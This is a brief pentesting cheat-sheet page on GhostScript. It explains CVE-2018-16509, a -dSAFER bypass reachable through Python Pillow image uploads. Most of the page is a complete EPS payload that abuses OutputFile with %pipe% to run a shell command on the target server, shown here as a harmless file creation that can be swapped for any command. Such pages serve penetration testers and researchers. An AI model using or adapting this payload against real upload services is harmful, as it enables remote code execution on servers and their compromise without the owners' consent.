icon

GhostScript Pentesting

Last modified: 2023-08-10

GhostScriipt is an interpreter for the PostScript language and PDF files. It might be vulnerable to code execution.

Arbitrary Command Execution (CVE-2018-16509) Before v9.24

Reference: https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509

If target website uses the functionality which allows user to upload image files associated Python's Pillow (PIL), we can execute remote command over GhostScript vulnerability (-dSAFER bypass using OutputFile).
Create an image file in which contents as below, then upload it. Command will be executed in the target server.

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops